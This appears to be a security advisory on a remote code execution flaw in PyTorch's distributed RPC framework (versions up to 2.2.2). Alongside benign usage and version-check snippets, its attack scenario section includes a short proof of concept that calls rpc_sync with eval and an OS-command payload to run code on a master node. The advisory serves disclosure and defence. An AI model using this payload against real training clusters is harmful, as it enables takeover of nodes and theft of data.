Critical Severity

pytorch

Remote Code Execution in Distributed RPC Framework

A vulnerability in PyTorch's torch.distributed.rpc framework allows remote code execution because RPC calls are dispatched without any verification of the function being invoked. The issue affects versions up to and including 2.2.2. By naming built-in Python functions such as eval in an RPC call, an attacker can execute arbitrary commands on master nodes in distributed training scenarios.
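For reference, the call shape at issue looks like the sketch below; in affected versions, rpc_sync ships any picklable callable, including Python built-ins, to the destination node without checking it. The node name is a placeholder, and an already-initialized RPC group is assumed:

```python
import torch.distributed.rpc as rpc

# rpc_sync(to, func, args) resolves `func` on the destination node and
# blocks until it has executed there. In affected versions (<= 2.2.2),
# no allowlist or verification is applied to `func`.
result = rpc.rpc_sync("worker1", min, args=(1, 2))  # even a builtin runs remotely
```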

Publicly disclosed on May 31, 2024

Threat Overview

The torch.distributed.rpc framework in PyTorch supports distributed training by providing remote procedure call (RPC) communication between nodes. The framework, however, does not validate the function named in an RPC operation, so an attacker can have a remote node execute any Python function, including built-ins such as eval, leading to remote code execution (RCE) on master nodes. This absence of function verification and security filtering in the RPC call path exposes master nodes to compromise and poses a significant threat to the integrity and security of distributed training environments.
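To illustrate the framework's intended use, here is a minimal sketch of a two-node RPC setup running a benign user-defined function. The address, port, and node names are placeholders, and a second process joining as "worker1" (rank 1) is assumed:

```python
import os
import torch.distributed.rpc as rpc

def add(a, b):
    # An ordinary user-defined function meant to run on the remote node.
    return a + b

# Placeholder rendezvous settings, shared by both processes.
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = "29500"

rpc.init_rpc("worker0", rank=0, world_size=2)

# The callable is sent by reference and executed on "worker1"; affected
# versions never check which function the caller requested.
out = rpc.rpc_sync("worker1", add, args=(2, 3))  # -> 5

rpc.shutdown()
```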

Attack Scenario

An attacker who controls a worker node in a distributed training setup can exploit this vulnerability to run arbitrary commands on the master node. From the worker, the attacker issues an RPC call with rpc.rpc_sync, naming the built-in eval as the target function and passing malicious code as its argument. The attacker's code then executes on the master node, potentially compromising it and allowing the attacker to steal sensitive data or move further into the network.
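A sketch of that attack path, assuming the attacker's worker has already joined the victim's RPC group and the master node is registered under the name "master" (the payload string is a placeholder):

```python
import torch.distributed.rpc as rpc

# From the attacker-controlled worker: rpc_sync resolves the built-in
# `eval` on the master node and executes it with an attacker-supplied
# expression, yielding code execution in the master's process.
rpc.rpc_sync(
    "master",
    eval,
    args=('__import__("os").system("id")',),  # placeholder payload
)
```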

Who is affected

The vulnerability affects master nodes in distributed training environments that use PyTorch's torch.distributed.rpc framework, specifically versions up to and including 2.2.2. Developers and organizations that rely on the framework for distributed training, such as reinforcement learning, model parallelism, and parameter-server training, risk having their master nodes compromised.
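As a quick way to tell whether a given installation falls in the affected range, the installed version can be compared against 2.2.2; a minimal sketch, assuming the packaging library (a standard pip dependency) is available:

```python
import torch
from packaging.version import Version  # assumed available alongside pip

# Strip any local build suffix such as "+cu121" before comparing.
installed = Version(torch.__version__.split("+")[0])
if installed <= Version("2.2.2"):
    print(f"torch {torch.__version__} is within the affected range (<= 2.2.2)")
```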
